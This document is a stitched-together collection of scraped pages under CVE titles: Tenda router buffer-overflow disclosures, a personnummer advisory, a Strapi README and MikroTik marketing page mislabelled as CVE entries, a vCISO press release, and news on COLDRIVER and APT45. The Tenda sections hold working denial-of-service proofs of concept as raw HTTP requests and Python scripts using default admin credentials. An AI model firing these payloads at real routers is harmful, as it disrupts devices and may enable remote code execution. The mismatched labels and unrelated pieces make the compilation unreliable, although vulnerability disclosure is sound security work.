Tenda AX12 v22.03.01.21 was discovered to contain a stack buffer overflow in the function sub_422CE4. This vulnerability allows attackers to cause a Denial of Service (DoS) via the strcpy parameter.

**Tenda Router AX12 Vulnerability**

This vulnerability lies in the `goform/setIPv6Status` page which influences the lastest version of Tenda Router AX12. (lastest version of this product is V22.03.01.21\_CN)

**Vulnerability description**

There is a stack buffer overflow vulnerability in function `sub_422CE4`

This function uses `strcpy` to copy the string pointed by `v6` into a stack buffer pointed by `v21`,while `v6` gets in a parameter called `prefixDelegate` and use that input value without any check.

![image-20220115010231776](https://github.com/sec-bin/IoT-CVE/raw/main/Tenda/AX12/2/1.png)

So when strcpy is called, a stack overflow occurs, the attacker can easily perform a **DoS Attack**.

**POC**

    POST /goform/setIPv6Status HTTP/1.1
    Host: tendawifi.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 615
    Connection: close
    Referer: http://tendawifi.com/index.html
    
    prefixDelegate=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaaaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaaaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaaaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaaaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaaaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
    

**Timeline**

*   2021.12.19 report to CVE & CNVD
*   2022.01.07 CNVD ID assigned: CNVD-2022-01443
*   2022.02.10 CVE ID assigned : CVE-2021-45392

CVE-2021-46408: IoT-CVE/Tenda/AX12/2 at main · sec-bin/IoT-CVE

Tenda AC18 router v15.03.05.19 and v15.03.05.05 was discovered to contain a stack overflow via the time parameter at /goform/PowerSaveSet.

**Tenda AC18 Unauthorized stack overflow vulnerability******1\. Affected version:****

V15.03.05.05\_multi and V15.03.05.19\_multi

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

In function setSmartPowerManagement， the v13 variable is obtained directly from the http request parameter time . Then v13 will be splice to stack by function sscanf without any security check, which causes stack overflow. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

In order to reproduce the vulnerability, the following steps can be followed:

1.Use the fat simulation firmware V15.03.05.19\_multi

2.Attack with the following overflow POC attacks

    POST /goform/PowerSaveSet HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: /
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1999
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/sleep_mode.html?random=0.9629635312680853&
    Cookie: password=0d403f6ad9aea37a98da9255140dbf6ektscvb
    
    powerSavingEn=1&time=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111100%3A0001%3A00&ledCloseType=allClose&powerSaveDelay=1
    

This PoC can result in a Dos.

CVE-2022-38311: NWPU_Projct/Tenda/AC18/5 at main · rickytriky/NWPU_Projct

Tenda W20E router V15.11.0.6 (US_W20EV4.0br_V15.11.0.6(1068_1546_841)_CN_TDC) contains a stack overflow vulnerability in the function formIPMacBindDel with the request /goform/delIpMacBind/

**\* Tenda W20E stack vulnerability****\* Version**

V15.11.0.6 (US\_W20EV4.0br\_V15.11.0.6(1068\_1546\_841)\_CN\_TDC)

**\* Firmware**

https://www.tenda.com.cn/download/detail-2707.html

**\* Vulnerability Detail**

In function formIPMacBindDel, the content obtained by the program from the parameter "IPMacBindIndex" is passed to \_\_src, and then the \_\_src is directly copied into the indexs stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

void formIPMacBindDel(webs\_t wp,char \*path,char \*query)

{
  char \*\_\_src;
  char msg \[512\];
  char out \[64\];
  char indexs \[128\];
  int i;
  int n;
  char \*indexSet;
  
  memset(indexs,0,0x80);
  out.\_0\_4\_ = 0x31;
  memset(out + 4,0,0x3c);
  msg.\_0\_4\_ = 0;
  memset(msg + 4,0,0x1fc);
  \_\_src = websGetVar(wp,"IPMacBindIndex","0");
  strcpy(indexs,\_\_src); //here is overflow
  delete\_rules\_in\_list("security.ipbind.list",indexs,"\\t");
  sprintf(msg,"op=%d",5);
  send\_msg\_to\_netctrl(0xb,msg);
  CommitCfm();
  outputToWebs(wp,out);
  return;
}

**\* POC**

import requests

cmd  \= b'IPMacBindIndex=' + b'A' \* 800 

url \= b"http://192.168.2.2/login/Auth"
payload \= b"http://192.168.2.2/goform/delIpMacBind/?" + cmd

data \= {
    "username": "admin",
    "password": "admin",
}

def attack():
    s \= requests.session()
    resp \= s.post(url\=url, data\=data)
    print(resp.content)
    resp \= s.post(url\=payload, data\=data)
    print(resp.content)

attack()

CVE-2022-40867: Router-vuls/formIPMacBindDel.md at main · CPSeek/Router-vuls

The personnummer implementation before 3.0.3 for Dart mishandles numbers in which the last four digits match the ^000[0-9]$ regular expression.

This vulnerability was reported to the personnummer team in June 2020. The slow response was due to locked ownership of some of the affected packages, which caused delays to update packages prior to disclosure.

The vulnerability is determined to be low severity.

**Impact**

This vulnerability impacts users who rely on the for last digits of personnummer to be a _real_ personnummer.

**Patches**

The issue have been patched in all repositories. The following versions should be updated to as soon as possible:

C# 3.0.2  
D 3.0.1  
Dart 3.0.3  
Elixir 3.0.0  
Go 3.0.1  
Java 3.3.0  
JavaScript 3.1.0  
Kotlin 1.1.0  
Lua 3.0.1  
PHP 3.0.2  
Perl 3.0.0  
Python 3.0.2  
Ruby 3.0.1  
Rust 3.0.0  
Scala 3.0.1  
Swift 1.0.1

If you are using any of the earlier packages, please update to latest.

**Workarounds**

The issue arrieses from the regular expression allowing the first three digits in the last four digits of the personnummer to be  
000, which is invalid. To mitigate this without upgrading, a check on the last four digits can be made to make sure it's not  
000x.

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in Personnummer Meta
*   Email us at Personnummer Email

**References**

*   GHSA-4xh4-v2pq-jvhm
*   https://pub.dev/packages/personnummer

CVE-2023-22963: GHSA-4xh4-v2pq-jvhm - GitHub Advisory Database

Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter time at /goform/saveParentControlInfo.

\# Tenda AC10 v4 was discovered stack overflow via parameter time at url /goform/saveParentControlInfo ###### tags: \`Tenda\` \`AC10 v4\` vendor:Tenda product:AC10 v4 version:US\_AC10V4.0si\_V16.03.10.13\_cn type:Stack Overflow author:Yifeng Li，Wolin Zhuang，Shencai Zhu; ## Vulnerability Description Tenda AC10 v4 US\_AC10V4.0si\_V16.03.10.13\_cn was discovered to contain a stack overflow via parameter time at url /goform/saveParentControlInfo. ## Vulnerability Details In function saveParentControlInfo line 23, program proceed into function compare\_parentcontrol\_time. !\[\](https://hackmd.io/\_uploads/HJvL1eGS2.png) In function compare\_parentcontrol\_time, v3 & v4 are local varialbes. !\[\](https://hackmd.io/\_uploads/r1\_vJeGB2.png) The content obtained by parameter 'time' is passed into s without length check. Then in line 27 the strings in s are formatted into v4 and v3, which leads to a stack overflow vulnerbility. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router AC10 v4 to newest version 2. Run poc script. !\[\](https://hackmd.io/\_uploads/B17y8gMS2.png) \`\`\` import requests exp = b'a'\*100 url = "http://192.168.0.1/goform/saveParentControlInfo?time=%s" % exp payload={} headers = {} response = requests.request("GET", url, headers=headers, data=payload) print(response.text) \`\`\` Run poc.py and you will see process httpd crash, segmentation fault. !\[\](https://hackmd.io/\_uploads/H1\_kEz5S3.png) And you can write your own exp to get the root shell.

CVE-2023-34566: Tenda AC10 v4 was discovered stack overflow via parameter time at url /goform/saveParentControlInfo - HackMD

An arbitrary file upload vulnerability in the file upload module of Strapi v4.1.5 allows attackers to execute arbitrary code via a crafted file.

 ![Strapi logo](https://camo.githubusercontent.com/b25f65a5c408dcaeef14b726f979f704a243779bfc87649bf8bb989128306513/68747470733a2f2f7374726170692e696f2f6173736574732f7374726170692d6c6f676f2d6461726b2e737667)![Strapi logo](https://camo.githubusercontent.com/7b181416931b19e4f5c19a139a9f8609621f9b8350f266f543bf19f93c7bf219/68747470733a2f2f7374726170692e696f2f6173736574732f7374726170692d6c6f676f2d6c696768742e737667)

**API creation made simple, secure and fast.**

The most advanced open-source headless CMS to build powerful APIs with no effort.

Try live demo

 ![NPM Version](https://camo.githubusercontent.com/aac2f800b4cf4086f7a228638389a16988fcc910098191c206d55fd885c0b837/68747470733a2f2f696d672e736869656c64732e696f2f6e706d2f762f407374726170692f7374726170692f6c61746573742e737667)![Tests](https://github.com/strapi/strapi/actions/workflows/tests.yml/badge.svg?branch=master) ![Strapi on Discord](https://camo.githubusercontent.com/78d3787edf60450ff576c1042086f935a56e4d8b024ba4d1e69b4a5e1de0af3c/68747470733a2f2f696d672e736869656c64732e696f2f646973636f72642f3831313938393136363738323032313633333f6c6162656c3d446973636f7264)

![Administration panel](https://raw.githubusercontent.com/strapi/strapi/0bcebf77b37182fe021cb59cc19be8f5db4a18ac/public/assets/administration_panel.png)

Strapi is a free and open-source headless CMS delivering your content anywhere you need.

*   **Keep control over your data**. With Strapi, you know where your data is stored, and you keep full control at all times.
*   **Self-hosted**. You can host and scale Strapi projects the way you want. You can choose any hosting platform you want: AWS, Render, Netlify, Heroku, a VPS, or a dedicated server. You can scale as you grow, 100% independent.
*   **Database agnostic**. Strapi works with SQL databases. You can choose the database you prefer: PostgreSQL, MySQL, MariaDB, and SQLite.
*   **Customizable**. You can quickly build your logic by fully customizing APIs, routes, or plugins to fit your needs perfectly.

**Getting Started**

Read the Getting Started tutorial or follow the steps below:

**⏳ Installation**

Install Strapi with this **Quickstart** command to create a Strapi project instantly:

*   (Use **yarn** to install the Strapi project (recommended). Install yarn with these docs.)

yarn create strapi-app my-project --quickstart

**or**

*   (Use npm/npx to install the Strapi project.)

npx create-strapi-app my-project --quickstart

This command generates a brand new project with the default features (authentication, permissions, content management, content type builder & file upload). The **Quickstart** command installs Strapi using a **SQLite** database which is used for prototyping in development.

Enjoy 🎉

**🖐 Requirements**

Complete installation requirements can be found in the documentation under Installation Requirements.

**Supported operating systems**:

*   Ubuntu LTS/Debian 9.x
*   CentOS/RHEL 8
*   macOS Mojave
*   Windows 10
*   Docker - Docker-Repo

(Please note that Strapi may work on other operating systems, but these are not tested nor officially supported at this time.)

**Node:**

*   NodeJS >= 12 <= 16
*   NPM >= 6.x

**Database:**

*   MySQL >= 5.7.8
*   MariaDB >= 10.2.7
*   PostgreSQL >= 10
*   SQLite >= 3

**We recommend always using the latest version of Strapi to start your new projects**.

**Features**

*   **Modern Admin Panel:** Elegant, entirely customizable and a fully extensible admin panel.
*   **Secure by default:** Reusable policies, CORS, CSP, P3P, Xframe, XSS, and more.
*   **Plugins Oriented:** Install the auth system, content management, custom plugins, and more, in seconds.
*   **Blazing Fast:** Built on top of Node.js, Strapi delivers amazing performance.
*   **Front-end Agnostic:** Use any front-end framework (React, Vue, Angular, etc.), mobile apps or even IoT.
*   **Powerful CLI:** Scaffold projects and APIs on the fly.
*   **SQL databases:** Works with PostgreSQL, MySQL, MariaDB, and SQLite.

**See more on our website**.

**Contributing**

Please read our Contributing Guide before submitting a Pull Request to the project.

**Community support**

For general help using Strapi, please refer to the official Strapi documentation. For additional help, you can use one of these channels to ask a question:

*   Discord (For live discussion with the Community and Strapi team)
*   GitHub (Bug reports, Contributions)
*   Community Forum (Questions and Discussions)
*   ProductBoard (Roadmap, Feature requests)
*   Twitter (Get the news fast)
*   Facebook
*   YouTube Channel (Learn from Video Tutorials)

**Migration**

Follow our migration guides on the documentation to keep your projects up-to-date.

**Roadmap**

Check out our roadmap to get informed of the latest features released and the upcoming ones. You may also give us insights and vote for a specific feature.

**Documentation**

See our dedicated repository for the Strapi documentation, or view our documentation live:

*   Developer docs
*   User guide

**Try live demo**

See for yourself what's under the hood by getting access to a hosted Strapi project with sample data.

**License**

See the LICENSE file for licensing information.

CVE-2022-27263: GitHub - strapi/strapi: 🚀 Open source Node.js Headless CMS to easily build customisable APIs

An issue in the bridge2 component of MikroTik RouterOS v6.40.5 allows attackers to cause a Denial of Service (DoS) via crafted packets.

*   **RB5009**
    
    The ultimate heavy-duty home lab router with USB 3.0, 1G and 2.5G Ethernet and a 10G SFP+ cage. You can mount four of these new routers in a single 1U rackmount space! Unprecedented processing power in such a small form factor.
    
    More details
    
*   **hAP ac³**
    
    Our bestselling home router is back – and it is faster than ever! The hAP ac³ is the Swiss army knife of home networking with Gigabit Ethernet, handy iOS/Android app for easy configuration, PoE, 128 NAND and powerful external high-gain antennas.
    
    More details
    
*   **CCR2116**
    
    Forget about CPU limitations in 10G setups with this powerful 16-core ARM CPU based CCR. Double the performance of our previous 36-core CCR, 6x faster BGP performance. Includes an M.2 PCIe slot.
    
    More details
    
*   **CRS504-4XQ-IN**
    
    Your most affordable, compact, energy-efficient doorway to the world of 100 Gigabit networking. This switch is the next step in upgrading existing 10 or 25 Gigabit networks. Multiple powering options, dual hot-swap power supplies.
    
    More details
    
*   **hAP ax²**
    
    Supercharge your home network with the Gen6 AX wireless. hAP ax² has everything you might need in a primary home access point – and more! Forget endless reviews and comparisons – this is the perfect device for 99% of homes.
    
    More details
    
*   **Chateau 5G ax**
    
    The future of mobile internet. Gen6 AX Wireless, 2.5 Gigabit Ethernet, and the fastest LTE/5G modem with powerful built-in and external antennas. Jack of all trades... master of many!
    
    More details
    
*   **CCR2216-1G-12XS-2XQ**
    
    The new MikroTik flagship with the power of a whole fleet. Unleash the power of 100 Gigabit networking with L3 Hardware Offloading! This router can be a handy drop-in upgrade for existing CCR1072 setups.
    
    More details
    

**Latest videos**

**YOUR MIKROTIK SUBMISSIONS: Spotted In The Wild 2**

Thank you for sending your MikroTik setups - it was super fun to see all the different approaches. Keep them coming - and get your 10 EUR coupon code for our merch store! Daniel's blog: https://blog.danman.eu/minipci-e-dual-usb-card-extender/ James' YouTube channel @TechInTheCityHonolulu

**Ukrainian: cloud services**

Хмарні сервіси - нічого складного!

**WHAT'S NEW IN MIKROTIK?**

**Check out this rack!**

You do not want to miss out on our top secret product, do you? Make sure to watch the video and let us know, is this what you were missing in your life?

**Where it all began**

**MIKROTIK TRAINING**

**Training**

MikroTik training sessions are organized and provided by MikroTik Training Centers at various locations around the World. They are attended by network engineers, integrators and managers, who would like to learn about routing and managing wired and wireless networks using MikroTik RouterOS.

Find out more

**Trainers & Academies**

MikroTik Academies are educational institutions such as universities, technical schools, colleges, vocational schools, and other educational institutions offering semester time based Internet networking courses for their academic students using MikroTik RouterOS as a learning tool.

Open the map

**Graduation**

Every year there are around **2000 - 3000** graduates who have successfully completed a MikroTik courses. Our certificates are recognized world wide and stand for good knowledge about network administration, using RouterBOARD and RouterOS.

Training history

**HARDWARE & SOFTWARE**

**RouterOS**

RouterOS is the operating system of RouterBOARD hardware. It has all the necessary features for an ISP - routing, firewall, bandwidth management, wireless access point, backhaul link, hotspot gateway, VPN server and more. Quick and simple installation and an easy to use interface!

Find out more

**Product catalog**

MikroTik manufactures routers, switches and wireless systems for every purpose, from small office or home, to carrier ISP networks, there is a device for every purpose. See our product catalog for a complete list of our products and their features.

Open catalog

**Distribution**

To purchase our RouterBOARD, CCR, CRS and other products, and also to receive technical support and pre-sales consultation, please contact our wide network of distributors. See the map to find the nearest one.

Find out more

CVE-2023-24094: MikroTik

By Deeba Ahmed
The vCISO Directory comes to answer the increasing need of SMBs to manage their cybersecurity and helps them…
This is a post from HackRead.com Read the original post: First Directory of Virtual CISO Providers Launched by Cynomi

The vCISO Directory comes to answer the increasing need of SMBs to manage their cybersecurity and helps them find and engage with the right vendor.

TEL AVIV, ISRAEL, JUNE 22, 2023  – The industry’s first-ever directory of virtual Chief Information Security Officer service providers has gone live today at www.thevcisodirectory.com.

This extensive list of virtual CISO (vCISO) providers, collated by Cynomi, means that small- and medium-sized businesses (SMBs) can easily tap the expertise of qualified cybersecurity professionals to protect their digital assets and ensure compliance.

Cyberattacks are on the rise, with Check Point Software’s Mid-Year Security Report revealing a 42% global increase in malicious incidents during the first half of 2022. In this climate, strong cybersecurity measures are crucial. However, most small and medium size companies do not have a CISO of their own, usually because they lack the budget to fill such a position.

This problem is compounded by the talent gap that makes it difficult to find individuals with the necessary skill and specialized experience. According to research by Datto, only 50% of SMBs have a dedicated, internal IT person who manages their cybersecurity needs.

To address this gap and help organizations shore up their cyberdefenses, managed service providers (MSPs,) managed security service providers (MSSPs) and consultancies have developed vCISO services.

They enable businesses to avail themselves of the expertise and skills of a professional CISO to improve their cybersecurity posture, while only paying for an agreed scope of work, usually a fraction of the cost of an in-house security expert. Cynomi, by publishing the industry’s first vCISO directory, is making it simple for businesses to access this expanding pool of resources.

At launch, the vCISO directory contains more than 200 listings of U.S.-based providers, together with details on the specific services they offer and the technology platforms they use to guide and implement their security strategies. The directory will be continually updated and expanded globally to incorporate international providers. 

“Thousands of small and mid-sized businesses globally could benefit from the expertise and support of a traditional CISO, but on a more consultative or part-time basis”, said David Primor, co-founder and CEO of Cynomi. “This is where the vCISO services come in. Our new directory enables businesses to find all vCISO service providers in one place and make an informed choice between the different benefits of the many providers available.”

“Couple of years back we weren’t prioritizing our cybersecurity services, but then we started getting consistent security-as-a-service requests,” said Chris Bevil, CISO of InfoSystems, an MSP located in Tennessee, U.S.A. “We realized that setting up a robust vCISO offering was in our best business interest. In the present climate, this has been a significant boost to our business and positioned us as a leading MSP in our region.”

MSPs and MSSPs offering vCISO services that are not yet included in the directory can submit their details for consideration here. 

**About Cynomi**

Cynomi’s AI-driven platform empowers MSSPs, MSPs and consultancies to offer vCISO services to SMEs at scale and provide them with proactive cyber resilience. Combining proprietary AI algorithms with CISO-level knowledge and knowhow, Cynomi’s platform streamlines the vCISO’s work while automating manual time-consuming tasks including risk assessment, compliance readiness, cyber posture reporting, creation of tailored security policies and remediation plans, as well as task management optimization. 

Cynomi helps partners overcome the cybersecurity skill gap and scale their business, allowing them to offer new services, upsell and increase revenues while reducing operational costs. 

Established in 2020 with the vision that every company deserves a CISO, and with a channel-only approach, Cynomi now serves more than 50 partners worldwide. 

To learn more about Cynomi’s solution for MSPs, MSSPs, and cyber consultancies visit www.cynomi.com.

*   Rotem Shemesh, VP of Marketing, Cynomi
*   rotem@cynomi.com

First Directory of Virtual CISO Providers Launched by Cynomi

The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities.
The Microsoft Threat Intelligence team is tracking under the cluster as Star Blizzard (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53),

Threat Intelligence / Cyber Espionage

The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities.

The Microsoft Threat Intelligence team is tracking under the cluster as **Star Blizzard** (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), and TA446.

The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said.

Star Blizzard, linked to Russia's Federal Security Service (FSB), has a track record of setting up lookalike domains that impersonate the login pages of targeted companies. It's known to be active since at least 2017.

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

In August 2023, Recorded Future revealed 94 new domains that are part of the threat actor's attack infrastructure, most of which feature keywords related to information technology and cryptocurrency.

Microsoft said it observed the adversary leveraging server-side scripts to prevent automated scanning of the actor-controlled infrastructure starting April 2023, moving away from hCaptcha to determine targets of interest and redirecting the browsing session to the Evilginx server.

The server-side JavaScript code is designed to check if the browser has any plugins installed, if the page is being accessed by an automation tool like Selenium or PhantomJS, and transmit the results to the server in the form of a HTTP POST request.

"Following the POST request, the redirector server assesses the data collected from the browser and decides whether to allow continued browser redirection," Microsoft said.

"When a good verdict is reached, the browser receives a response from the redirection server, redirecting to the next stage of the chain, which is either an hCaptcha for the user to solve, or direct to the Evilginx server."

Also newly used by Star Blizzard are email marketing services like HubSpot and MailerLite to craft campaigns that serve as the starting point of the redirection chain that culminates at the Evilginx server hosting the credential harvesting page.

In addition, the threat actor has been observed using a domain name service (DNS) provider to resolve actor-registered domain infrastructure, sending password-protected PDF lures embedding the links to evade email security processes as well as host the files on Proton Drive.

That's not all. In a sign that the threat actor is actively keeping tabs on public reporting into its tactics and techniques, it has now upgraded its domain generation algorithm (DGA) to include a more randomized list of words when naming them.

Despite these changes, "Star Blizzard activities remain focused on email credential theft, predominantly targeting cloud-based email providers that host organizational and/or personal email accounts," Microsoft said.

"Star Blizzard remains constant in their use of pairs of dedicated VPSs to host actor-controlled infrastructure (redirector + Evilginx servers) used for spear-phishing activities, where each server usually hosts a separate actor registered domain."

**U.K. Sanctions Two Members of Star Blizzard**

The development comes as the U.K. called out Star Blizzard for "sustained unsuccessful attempts to interfere in U.K. political processes" by targeting high-profile individuals and entities through cyber operations.

Besides linking Star Blizzard to Centre 18, a subordinate element within FSB, the U.K. government sanctioned two members of the hacking crew – Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets (aka Alexey Doguzhiev) – for their involvement in the spear-phishing campaigns.

The activity "resulted in unauthorized access and exfiltration of sensitive data, which was intended to undermine UK organizations and more broadly, the UK government," it said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of COLDRIVER's Evolving Evading and Credential-Stealing Tactics

A North Korea-linked threat actor known for its cyber espionage operations has gradually expanded into financially-motivated attacks that involve the deployment of ransomware, setting it apart from other nation-state hacking groups linked to the country.
Google-owned Mandiant is tracking the activity cluster under a new moniker APT45, which overlaps with names such as Andariel, Nickel Hyatt,

A North Korea-linked threat actor known for its cyber espionage operations has gradually expanded into financially-motivated attacks that involve the deployment of ransomware, setting it apart from other nation-state hacking groups linked to the country.

Google-owned Mandiant is tracking the activity cluster under a new moniker **APT45**, which overlaps with names such as Andariel, Nickel Hyatt, Onyx Sleet, Stonefly, and Silent Chollima.

"APT45 is a long-running, moderately sophisticated North Korean cyber operator that has carried out espionage campaigns as early as 2009," researchers Taylor Long, Jeff Johnson, Alice Revelli, Fred Plan, and Michael Barnhart said. "APT45 has been the most frequently observed targeting critical infrastructure."

It's worth mentioning that APT45, along with APT38 (aka BlueNoroff), APT43 (aka Kimsuky), and Lazarus Group (aka TEMP.Hermit), are elements within North Korea's Reconnaissance General Bureau (RGB), the nation's premier military intelligence organization.

APT45 is notably linked to the deployment of ransomware families tracked as SHATTEREDGLASS and Maui targeting entities in South Korea, Japan, and the U.S. in 2021 and 2022. Details of SHATTEREDGLASS were documented by Kaspersky in June 2021.

"It is possible that APT45 is carrying out financially-motivated cybercrime not only in support of its own operations but to generate funds for other North Korean state priorities," Mandiant said.

Another notable malware in its arsenal is a backdoor dubbed Dtrack (aka Valefor and Preft), which was first used in a cyber attack aimed at the Kudankulam Nuclear Power Plant in India in 2019, marking one of the few publicly known instances of North Korean actors striking critical infrastructure.

"APT45 is one of North Korea's longest running cyber operators, and the group's activity mirrors the regime's geopolitical priorities even as operations have shifted from classic cyber espionage against government and defense entities to include healthcare and crop science," Mandiant said.

"As the country has become reliant on its cyber operations as an instrument of national power, the operations carried out by APT45 and other North Korean cyber operators may reflect the changing priorities of the country's leadership."

The findings come as security awareness training firm KnowBe4 said it was tricked into hiring an IT worker from North Korea as a software engineer, who used a stolen identity of a U.S. citizen and enhanced their picture using artificial intelligence (AI).

"This was a skillful North Korean IT worker, supported by a state-backed criminal infrastructure, using the stolen identity of a U.S. citizen participating in several rounds of video interviews and circumvented background check processes commonly used by companies," the company said.

The IT worker army, assessed to be part of the Workers' Party of Korea's Munitions Industry Department, has a history of seeking employment in U.S.-based firms by pretending to be located in the country when they are actually in China and Russia and logging-in remotely through company-issued laptops delivered to a "laptop farm."

KnowBe4 said it detected suspicious activities on the Mac workstation sent to the individual on July 15, 2024, at 9:55 p.m. EST that consisted of manipulating session history files, transferring potentially harmful files, and executing harmful software. The malware was downloaded using a Raspberry Pi.

Twenty-five minutes later, the Florida-based cybersecurity company said it contained the employee's device. There is no evidence that the attacker gained unauthorized access to sensitive data or systems.

"The scam is that they are actually doing the work, getting paid well, and giving a large amount to North Korea to fund their illegal programs," KnowBe4's chief executive Stu Sjouwerman said.

"This case highlights the critical need for more robust vetting processes, continuous security monitoring, and improved coordination between HR, IT, and security teams in protecting against advanced persistent threats."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us